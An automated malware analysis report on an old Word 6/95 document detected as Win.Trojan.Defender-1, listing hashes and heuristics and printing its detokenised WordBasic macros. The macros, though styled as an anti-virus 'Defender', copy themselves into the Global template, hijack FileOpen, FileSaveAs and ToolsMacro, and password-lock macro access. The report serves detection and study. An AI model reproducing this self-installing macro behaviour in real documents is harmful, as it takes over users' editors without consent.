Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ae8654f74ca374ea…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 14.0 KB    First seen: 2012-06-14
MD5:     e656a99096913a45d510198a8569d16a
SHA-1:   b890cc9c368e68fb76ae6a3fb170ce4c711bb75d
SHA-256: ae8654f74ca374ea88461ad7ecd53627807b83fa6ea99c974de837d7a1d62720
Risk score: 122

Malware Insights

MITRE ATT&CK
  • T1566.001 Spearphishing Attachment
  • T1059.005 Visual Basic

The file contains legacy WordBasic macro-virus markers and triggers a heuristic for a lure to enable macros, suggesting it is designed to execute macro code. The document body explicitly mentions 'RSN MACRO VIRUS Goat file' and includes VBA-like structures, pointing towards a macro-based attack. The ClamAV detection as 'Win.Trojan.Defender-1' further confirms its malicious nature.

Heuristics (4)

  • ClamAV: Win.Trojan.Defender-1 [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Win.Trojan.Defender-1.
  • Legacy WordBasic macro-virus markers [high, OLE_LEGACY_WORDBASIC_MACRO_VIRUS]
    The OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro, or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • Macro/content-enable lure [medium, SE_ENABLE_LURE]
    The document instructs the user to enable macros or editing, a common technique used by malware droppers to bypass Office macro security settings.
  • Recovered legacy WordBasic macro source [info, OLE_LEGACY_WORDBASIC_MACRO_SOURCE]
    The Word 6.0/95 document stores tokenised WordBasic macros in the WordDocument stream rather than as a modern VBA project, so VBA source extraction cannot see them. The macro source was detokenised and carved so that its identifiers, string literals (file paths, URLs, registry keys, message text) and comments are available for review and signature scanning.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename               Kind              Source                                                              Size
wordbasic_macros.txt   wordbasic-macro   analyzer.wordbasic (detokenised Word 6/95 WordBasic macro source)   7172 bytes
SHA-256: 7dccb6e33778f6bfd30dc05d7db2a98d5a4fef78a320fe91f98bea828937a422
Preview script (first 1,000 lines of the extracted script; unresolved WordBasic opcodes are shown as @cmdXXXX tokens)
= = =
12645 =
12901          
        357 =
13157 * ,   ,  
29797 ,         =
13413 = = = =
MAIN
, - * ErrHandler
FoundVirus = 0
TellUser$ = " virus macro(s) have been detected and removed from the Global Template"
REM Initialize Word settings
@cmd01b1 , = 0
@cmd00d1 = 0 , = 0 , = 0 , = 0 , = 0 , = 0 , = 0 , = 1 , = "7" , = , = , = 0
@cmd00cb = 1 , = 0 , = 0 , = 0 , = 1 , = 1 , + = 1 , = 1 , = 0 , = , = 1 ,   = 1
iMacroCount = @cmd80b7 0 , 0
REM Search the Global Template for virus macros
i = 1 iMacroCount
@cmd80b8 i = "AAAZAO"
eAAAZAO = 1
@cmd80b8 i = "AAAZFS"
eAAAZFS = 1
@cmd80b8 i = "FilePrint"
eFilePrint = 1
@cmd80b8 i = "FilePrintDefault"
eFilePrintDefault = 1
@cmd80b8 i = "FileSave"
eFileSave = 1
@cmd80b8 i = "CloseUpData"
eCloseUpData = 1
@cmd80b8 i = "FileConvertText"
eFileConvertText = 1
i
24933
eFileConvertText = 1
FoundVirus = FoundVirus = Clean "FileConvertText"
eCloseUpData = 1
FoundVirus = FoundVirus = Clean "CloseUpData"
eFilePrintDefault = 1
FoundVirus = FoundVirus = Clean "FilePrintDefault"
eFilePrint = 1
FoundVirus = FoundVirus = Clean "FilePrint"
eFileSave = 1
FoundVirus = FoundVirus = Clean "FileSave"
eAAAZAO = 1
FoundVirus = FoundVirus = Clean "AAAZAO"
eAAAZFS = 1
FoundVirus = FoundVirus = Clean "AAAZFS"
REM ******************************************************************* 17516
iWW6IInstance = @cmd8006 @cmd814d "WW6Defender"
sMe$ = @cmd8025
sMacro$ = sMe$ = ":Module1"
@cmd80c2 sMacro$ , "Global:Module1"
sMacro$ = sMe$ = ":Module2"
@cmd80c2 sMacro$ , "Global:Module2"
sMacro$ = sMe$ = ":Module2"
@cmd80c2 sMacro$ , "Global:FileSaveAs"
sMacro$ = sMe$ = ":Module3"
@cmd80c2 sMacro$ , "Global:ToolsMacro"
sMacro$ = sMe$ = ":Module4"
@cmd80c2 sMacro$ , "Global:FileOpen"
sMacro$ = sMe$ = ":Defend"
@cmd80c2 sMacro$ , "Global:Defender"
@cmd8046 "WW6I" , @cmd8007 iWW6IInstance = 1
REM *******************************************************************	
REM Acknowledge user if Global Template is infected
FoundVirus 0
NumberOfVirus$ = @cmd8007 FoundVirus
TellUser$ = NumberOfVirus$ = TellUser$
@cmd802b TellUser$ , "Defender" , 64
* Done
29285
Err 53
@cmd802b "WARNING: Active macro virus found. Defender will now exit Word. You must then restart Word and try to load the document again" , "Defender" , 48
@cmd00d1 = 0 , = 0 , = 0 , = 0 , = 0 , = 0 , = 0 , = 1 , = "7" , = , = , = 0
@cmd80a2
* InstallDefender
"Defender has been installed successfully"
Clean Virus$
, - * ErrHandler
Clean = 0
SourceName$ = @cmd818e Virus$
SourceName$ SourceName$ "Built In"
@cmd00de , = SourceName$ , = Virus$ , = 3
Clean = 1
  * InstallDefender
29285
Err = 53
@cmd802b "WARNING: Active macro virus found. Defender will now exit Word. You must then restart Word and try to load the document again" , "Defender" , 48
@cmd00d1 = 0 , = 0 , = 0 , = 0 , = 0 , = 0 , = 0 , = 1 , = "7" , = , = , = 0
@cmd80a2
MAIN
REM FileSaveAs 
dlg @cmd0054
, - * Abort
dlg
dlg
dlg = 0 dlg = 1
sMe$ = @cmd8025
sTMacro$ = sMe$ = ":AutoOpen"
@cmd80c2 "Global:Module1" , sTMacro$
sTMacro$ = sMe$ = ":Module1"
@cmd80c2 "Global:Module1" , sTMacro$
sTMacro$ = sMe$ = ":Module2"
@cmd80c2 "Global:Module2" , sTMacro$
sTMacro$ = sMe$ = ":Module3"
@cmd80c2 "Global:ToolsMacro" , sTMacro$
sTMacro$ = sMe$ = ":Module4"
@cmd80c2 "Global:FileOpen" , sTMacro$
sTMacro$ = sMe$ = ":Defend"
@cmd80c2 "Global:Defender" , sTMacro$
@cmd0054 dlg
* Done
Err 102
@cmd0054 dlg
MAIN
"Runs, creates, deletes, or revises a macro"
, - * Abort
@cmd00d1 = 0 , = 0 , = 0 , = 0 , = 0 , = 0 , = 0 , = 1 , = "7" , = , = , = 0
Password$ = "Password"
Password$ = @cmd80b1 "Restricted area. Please Enter your password" , "Defender" , Password$
Password$ = @cmd8025
@cmd802b "Password incorrect. Access denied" , "Defender" , 16
* GetPassword
dlg @cmd00d7
dlg
dlg
@cmd00d7 dlg
REM  (c) Cybec Pty Ltd 1996
REM  Global:FileOpen macro
REM  Cleans every opened document infected with the WinWord.Concept virus
MAIN
dlg @cmd0050
, - * finish
dlg
dlg
@cmd0050 dlg
a$ = @cmd818e "AAAZAO"
b$ = @cmd818e "AAAZFS"
c$ = @cmd818e "PayLoad"
a$ b$ c$ a$ = b$ a$ = c$
@cmd00de , = a$ , = "AAAZAO" , = 3
@cmd00de , = a$ , = "AAAZFS" , = 3
@cmd00de , = a$ , = "PayLoad" , = 3
@cmd00de , = a$ , = "AutoOpen" , = 3
@cmd802b "The document was infected with the WinWord.Concept virus." = @cmd8005 13 = "The virus has been removed." = @cmd8005 13 = "Please, quit this document without saving and open it again." , " VET for Word v.2.1        (c) 1995 CYBEC P/L " , 16
@cmd80a3 1 , 1
@cmd0053
MAIN
, - * ErrHandler
FoundVirus = 0
TellUser$ = " virus macro(s) have been detected and removed from the Global Template"
REM Initialize Word settings
@cmd01b1 , = 0
@cmd00d1 = 0 , = 0 , = 0 , = 0 , = 0 , = 0 , = 0 , = 1 , = "7" , = , = , = 0
@cmd00cb = 1 , = 0 , = 0 , = 0 , = 1 , = 1 , + = 1 , = 1 , = 0 , = , = 1 ,   = 1
iMacroCount = @cmd80b7 0 , 0
REM Search the Global Template for virus macros
i = 1 iMacroCount
@cmd80b8 i = "AAAZAO"
eAAAZAO = 1
@cmd80b8 i = "AAAZFS"
eAAAZFS = 1
@cmd80b8 i = "FilePrint"
eFilePrint = 1
@cmd80b8 i = "FilePrintDefault"
eFilePrintDefault = 1
@cmd80b8 i = "FileSave"
eFileSave = 1
@cmd80b8 i = "CloseUpData"
eCloseUpData = 1
@cmd80b8 i = "FileConvertText"
eFileConvertText = 1
i
24933
eFileConvertText = 1
FoundVirus = FoundVirus = Clean "FileConvertText"
eCloseUpData = 1
FoundVirus = FoundVirus = Clean "CloseUpData"
eFilePrintDefault = 1
FoundVirus = FoundVirus = Clean "FilePrintDefault"
eFilePrint = 1
FoundVirus = FoundVirus = Clean "FilePrint"
eFileSave = 1
FoundVirus = FoundVirus = Clean "FileSave"
eAAAZAO = 1
FoundVirus = FoundVirus = Clean "AAAZAO"
eAAAZFS = 1
FoundVirus = FoundVirus = Clean "AAAZFS"
REM ******************************************************************* 17516
iWW6IInstance = @cmd8006 @cmd814d "WW6Defender"
sMe$ = @cmd8025
sMacro$ = sMe$ = ":Module1"
@cmd80c2 sMacro$ , "Global:Module1"
sMacro$ = sMe$ = ":Module2"
@cmd80c2 sMacro$ , "Global:Module2"
sMacro$ = sMe$ = ":Module2"
@cmd80c2 sMacro$ , "Global:FileSaveAs"
sMacro$ = sMe$ = ":Module3"
@cmd80c2 sMacro$ , "Global:ToolsMacro"
sMacro$ = sMe$ = ":Module4"
@cmd80c2 sMacro$ , "Global:FileOpen"
sMacro$ = sMe$ = ":Defend"
@cmd80c2 sMacro$ , "Global:Defender"
@cmd8046 "WW6I" , @cmd8007 iWW6IInstance = 1
REM *******************************************************************	
REM Acknowledge user if Global Template is infected
FoundVirus 0
NumberOfVirus$ = @cmd8007 FoundVirus
TellUser$ = NumberOfVirus$ = TellUser$
@cmd802b TellUser$ , "Defender" , 64
* Done
29285
Err 53
@cmd802b "WARNING: Active macro virus found. Defender will now exit Word. You must then restart Word and try to load the document again" , "Defender" , 48
@cmd00d1 = 0 , = 0 , = 0 , = 0 , = 0 , = 0 , = 0 , = 1 , = "7" , = , = , = 0
@cmd80a2
* InstallDefender
"Defender has been installed successfully"
Clean Virus$
, - * ErrHandler
Clean = 0
SourceName$ = @cmd818e Virus$
SourceName$ SourceName$ "Built In"
@cmd00de , = SourceName$ , = Virus$ , = 3
Clean = 1
  * InstallDefender
29285
Err = 53
@cmd802b "WARNING: Active macro virus found. Defender will now exit Word. You must then restart Word and try to load the document again" , "Defender" , 48
@cmd00d1 = 0 , = 0 , = 0 , = 0 , = 0 , = 0 , = 0 , = 1 , = "7" , = , = , = 0
@cmd80a2